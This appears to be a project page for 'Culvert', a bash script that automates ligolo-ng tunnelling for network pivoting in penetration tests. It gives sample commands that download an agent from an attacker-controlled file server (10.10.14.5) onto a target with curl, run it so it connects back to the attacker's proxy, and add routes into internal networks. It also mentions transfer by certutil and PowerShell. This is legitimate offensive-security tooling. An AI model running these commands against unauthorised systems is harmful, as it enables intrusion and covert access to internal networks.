One-command ligolo-ng tunnel setup. Automates TUN interface, routing, and agent connection. No proxychains needed — access target networks directly.
$ sudo ./culvert.sh auto [+] Downloading ligolo-ng v0.7.5... [+] TUN interface ligolo created [+] File server on :8000 [+] Proxy listening on :11601 STEP 1: Download agent on target $ curl http://10.10.14.5:8000/ligolo-agent -o /tmp/a STEP 2: Run agent on target $ /tmp/a -connect 10.10.14.5:11601 -ignore-cert
Auto-downloads binaries, configures TUN, starts file server, launches proxy. Step-by-step guidance with your IP pre-filled.
Run sudo ./culvert.sh auto and the script downloads ligolo-ng binaries, creates the TUN interface, starts a file server on port 8000, and launches the proxy.
Detects your attack IP by checking tun0, tun1, tap0, and default route in priority order. All generated commands use your actual IP.
Downloads agents for Linux (amd64/arm64), Windows (amd64), and macOS (arm64). Transfer commands provided for curl, PowerShell iwr, and certutil.
Removes all routes, stops the file server and proxy, tears down the TUN interface. No orphaned processes or stale routes left behind.
After setup, numbered steps with exact commands for agent transfer, connection, session selection, route addition, and tunnel start. Your IP is pre-filled in every command.
Each operation available as a standalone subcommand. download, setup-tun, add-route, status for granular control.
Full-featured on Kali, Ubuntu, and Debian. Agent binaries for Linux, Windows, and macOS.
Download, configure, start, guide. Single-file script with modular subcommands for granular control.
Fetches ligolo-ng proxy and agent binaries from GitHub releases. Stores in ~/.ligolo-ng. Multi-platform agent support out of the box.
Creates and activates TUN interface via ip tuntap. Route management with add-route and del-route subcommands.
Python HTTP file server on port 8000 for agent transfer. Proxy on configurable port (default 11601) with trap-based cleanup on exit.
Numbered steps with pre-filled IPs and exact commands. Agent transfer, connection, session selection, route addition, and tunnel start.
Single bash script with no build step. curl, jq, and tar are the only prerequisites.
$ curl -O https://raw.githubusercontent.com/Real-Fruit-Snacks/Culvert/main/culvert.sh $ chmod +x culvert.sh # Full automated setup $ sudo ./culvert.sh auto # Custom proxy port $ PROXY_PORT=443 sudo ./culvert.sh auto
# Add route to internal network $ sudo ./culvert.sh add-route 10.10.10.0/24 # Check current status $ ./culvert.sh status # Show agent commands for all platforms $ ./culvert.sh agent-cmd # Clean teardown $ sudo ./culvert.sh cleanup
ip aps